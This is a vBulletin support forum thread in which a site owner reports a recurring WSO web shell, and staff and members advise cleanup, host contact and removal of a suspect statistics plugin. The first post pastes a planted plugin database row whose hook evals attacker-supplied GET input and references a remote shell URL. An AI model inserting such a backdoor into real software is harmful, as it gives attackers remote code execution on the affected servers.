Forum Hacked

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • xhells21
    New Member
    • Aug 2011
    • 9

    Forum Hacked

    public_html/forums appear always a file called wso.php whitch is a shell of some script kiddie who keeps hacking into my forum
    then i checked the mysql database and found this

    INSERT INTO `plugin` (`pluginid`, `title`, `hookname`, `phpcode`, `product`, `devkey`, `active`, `executionorder`) VALUES
    (617, 'Sample', 'global_start', 'if (isset($_GET[''foo''])) die(eval(''$u="http://users.cjb.net/hayden/wso.txt";'' . $_GET[''foo'']));', 'vbulletin', '', 1, 5);

    and
    INSERT INTO `datastore` (`title`, `data`, `unserialize`) VALUES
    \r\n \r\nif (isset($_GET[''foo''])) die(eval(''$u="http://users.cjb.net/hayden/wso.txt";'' . $_GET[''foo'']));\r\n";s:10:"misc_start";s:53180:"\r\n if ($vbulletin->options[''vsatopstats_enable_global''] AND !is_member_of($vbulletin->userinfo, explode('','', $vbulletin->options[''vsatopstats_excl_groups''])))\r\n {\r\n $vsacb_resnr = $vbulletin->input->clean_gpc(''r'', ''vsacb_resnr'', TYPE_UINT);\r\n if ($vsacb_resnr < 1)\r\n {\r\n $vsacb_resnr = intval($vbulletin->options[''vsatopstats_amount_more'']);\r\n ( it continues i donno if i must paste all )



    Please help me fight this hacker away from my forums !
  • TheNewOne
    Senior Member
    • Aug 2011
    • 1033
    • 4.2.5

    #2
    vb version you are using? a link to your site will help staff

    Comment

    • xhells21
      New Member
      • Aug 2011
      • 9

      #3


      vBulletin® Version 4.1.10

      Comment

      • IcEWoLF
        Senior Member
        • Jul 2008
        • 928
        • 4.1.x

        #4
        I noticed you run vBSEO....
        I would strongly suggest visiting this thread.
        The 47 Ronin Gaming - www.47r-squad.com

        Comment

        • xhells21
          New Member
          • Aug 2011
          • 9

          #5
          i am already running the latest patched version of vbseo as i purchased it on 31st january 2012 while the fix thing was released by them on 25th january 2012 so its not vbseo as far as i know

          but who knows , maybe they not fully patched , in any case if this happens again and its cause of them i will go get my money back from this useless vbseo thing.

          Comment

          • Wayne Luke
            vBulletin Technical Support Lead
            • Aug 2000
            • 74129

            #6
            Someone has access to your server in some way in order to upload files like this. The file in question is not a vBulletin file. You should delete all files listed as Not Part of vBulletin when you run the File Version Diagnostic at Maintenance -> Diagnostics in your Admin CP.

            You would also need to delete the offending plugin that it installed to prevent being reinfected.
            Translations provided by Google.

            Wayne Luke
            The Rabid Badger - a vBulletin Cloud demonstration site.
            vBulletin 5 API

            Comment

            • Jake Bunce
              Senior Member
              • Dec 2000
              • 46598
              • 3.6.x

              #7
              Originally posted by xhells21
              public_html/forums appear always a file called wso.php whitch is a shell of some script kiddie who keeps hacking into my forum
              If he can upload files to your server then that means the server itself was likely compromised. You should contact your host about this. Hopefully they can identify the point of entry and take measures to fix it.

              edit - too slow

              Comment

              • xhells21
                New Member
                • Aug 2011
                • 9

                #8
                thanks a lot guys i have cleaned all the suspect files by deleting them and i have contacted my host but they clearly said it was a vulnerable script so i am hoping i got rid of any vulnerable scripts by uninstalling all outdated plugins


                i will keep you guys inform of how your help actually helped me

                thanks a lot all

                Comment

                • Maurd
                  Senior Member
                  • Jun 2011
                  • 672
                  • 4.1.x

                  #9
                  ($vbulletin->options[''vsatopstats_enable_global''] AND !is_member_of($vbulletin->userinfo, explode('','', $vbulletin->options[''vsatopstats_excl_groups''])))\r\n {\r\n $vsacb_resnr = $vbulletin->input->clean_gpc(''r'', ''vsacb_resnr'', TYPE_UINT);\r\n if ($vsacb_resnr < 1)\r\n {\r\n $vsacb_resnr = intval($vbulletin->options[''vsatopstats_amount_more''])
                  May or not be relevant, but since that's included, I wouldn't rule out that plugin. "vsatopstats" seems to be this: http://www.vbulletin.org/forum/showthread.php?t=235841.

                  If I recall correctly, one of his mods had been exploited before, too.
                  - Maurice Workin' in the Jira mine, goin' down, down, down

                  Comment

                  • xhells21
                    New Member
                    • Aug 2011
                    • 9

                    #10
                    Originally posted by Maurd
                    May or not be relevant, but since that's included, I wouldn't rule out that plugin. "vsatopstats" seems to be this: http://www.vbulletin.org/forum/showthread.php?t=235841.

                    If I recall correctly, one of his mods had been exploited before, too.
                    thanks , i informed the coder of vsa about this
                    Last edited by xhells21; Tue 7 Feb '12, 3:29am.

                    Comment

                    • EliasAlucard
                      Senior Member
                      • Nov 2009
                      • 101
                      • 4.2.5

                      #11
                      Originally posted by xhells21
                      Originally posted by Maurd
                      May or not be relevant, but since that's included, I wouldn't rule out that plugin. "vsatopstats" seems to be this: http://www.vbulletin.org/forum/showthread.php?t=235841. If I recall correctly, one of his mods had been exploited before, too.
                      thanks , i informed the coder of vsa about this
                      Did he respond to you? More importantly, did he patch it? My site was hacked recently too, and I also had the VSa - Advanced Forum Statistics. I've uninstalled it now just to be on the safe side.
                      “Human beings are animals: very unusual animals, to be sure, but nevertheless animals. In origin, we are not fallen angels, but apes arisen.” — Michael H. Hart

                      Comment

                      widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                      Working...